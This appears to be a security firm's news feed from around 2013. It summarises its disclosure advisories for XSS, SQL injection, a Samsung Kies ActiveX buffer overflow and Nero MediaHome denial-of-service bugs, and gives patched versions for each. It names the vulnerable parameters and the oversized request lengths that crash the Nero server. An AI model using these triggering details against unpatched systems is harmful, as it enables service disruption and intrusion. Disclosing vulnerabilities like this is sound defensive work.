High-Tech Bridge announces new Advisory Board members:
Their outstanding expertise and unique experience in the information security and business development will bring an sovereign and unbiassed assessment of High-Tech Bridge development and tactics to ensure the maximal level of information security services offered by High-Tech Bridge.
gpEasy CMS version 3.5.2 is vulnerable to perform cross-site scripting (XSS) attacks against logged-in administrator. Details of HTB23137 Cross-Site Scripting (XSS) vulnerability in gpEasy disclosed this week. The vulnerability exists due to insufficient sanitisation of user-supplied data in "section" HTTP GET parameter passed to "index.php" script. Vulnerability is fixed, change your "include/tool/editing_page.php" script to the latest version from GitHub. Full details available on researcher's page.
ImageCMS version 4.0.0b is vulnerable to perform SQL injection attacks. The vulnerability exists due to insufficient filtration of the "q" HTTP GET parameter passed to "/admin/admin_search/" URL. A remote authenticated administrator can execute arbitrary SQL commands in the application's database. Also this vulnerability can be exploited by remote non-authenticated attacker via CSRF vector because the application is prone to Cross-Site Request Forgery attack.
To stay secure from this vulnerability upgrade ImageCMS to 4.2 version.
Source: High-Tech Bridge Advisory HTB23132 - SQL Injection Vulnerability in ImageCMS.
OpenX Developers fixed vulnerabilities in OpenX 2.8.10 (September 28, 2012), which suffer from cross-site scripting and SQL injection vulnerabilities. After 4 months Golem.de at January 19, 2013 has published information about the further adventures of this vulnerabilities: BSI warnt vor Werbebannern mit Javascript-Malware.
Related Links:
Always stay secure.
The Ethical Hacker Network (Donald C. Donzal, Editor-In-Chief) interviewed Ilia Kolochenko, CEO of High-Tech Bridge about penetration testing, Web Applications Security, Vulnerability Research and more: Interview: Ilia Kolochenko, CEO of High-Tech Bridge.
Ilia Kolochenko at invest'11.
Samsung Kies 2.5.0.12114_1 is vulnerable to remote buffer overflow vulnerability. Vulnerability has been discovered by High-Tech Bridge Security Research Lab and can be exploited to execute arbitrary code on vulnerable system.
Description of buffer overflow in Samsung Kies:
The vulnerability exists due to insufficient sanitisation of input data in the PrepareSync() method within the ActiveX control SyncService.dll, GUID {EA8A3985-F9DF-4652-A255-E4E7772AFCA8}, located by default in "C:\Program Files\Samsung\Kies\External\DeviceModules\SyncService.dll".
A remote attacker can pass an arbitrary value to the "password" argument of the PrepareSync() method and trigger an ACCESS_VIOLATION exception, which could be exploited to successfully overwrite the EIP register and the SEH structure.
Details of Samsung KIES crash and Proof-of-concept (PoC) code is available on High-Tech Bridge website: Advisory HTB23136 - Remote Buffer Overflow Vulnerability in Samsung Kies.
Solution: Upgrade ro Samsung Kies version 2.5.1.12123_2_7.
Previously, High-Tech Bridge Security Research Lab had already discovered multiple vulnerabilities in Samsung Kies 2.3.2.12054_20.
Nero MediaHome version 4.5.8.0 is vulnerable to perform remote DoS (Denial-of-service) attacks. This could be exploited by an attacker to crash the server remotely.
The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted 1) HTTP request of at least 500'000 characters long 2) HTTP HEAD request of at least 265'696 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause 1) a stack-based buffer overrun 2) a heap-based buffer overrun that will immediately crash the Nero MediaHome server.
The vulnerability exists due to improper handling of the 1) HTTP OPTIONS method length 2) HTTP REFERER header length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet of 1) at least 265'712 characters long 2) at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.
The vulnerability exists due to improper handling of the HTTP HOST header within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet with missing HOST HTTP header. The Nero MediaHome server HTTP parser will crash immediately after receiving the aforementioned malformed HTTP request.
All details are available on High-Tech Bridge Advisory HTB23130 - Nero MediaHome Server Multiple Remote DoS vulnerabilities.
Cross-site scripting vulnerability in Quick.Cart 6.0 & Quick.Cms 5.0 were found and described in High-Tech Bridge Advisory HTB23135. Both products (Quick.Cms and Quick.Cart) developed by OpenSolution team, suffers from this vulnerabilities.
The exploitation examples in PoC examples use JS alert() function, nevertheless, a remote attacker can create an exploit for this vulnerability to bypass application's CSRF protection mechanism based on the HTTP Referer header and change administrator's password. Additional details can be found on researcher's page.
If you have installed Quick.Cms 5.0 and Quick.Cart 6.0 please make sure that they are released after December 19, 2012, because vendor fixed this 2 vulnerabilities without editing his Changelog. Latest unaffected versions: Quick.Cms v5.0 (release date 2012.12.20) and Quick.Cart v6.0 (release date 2012.12.21).
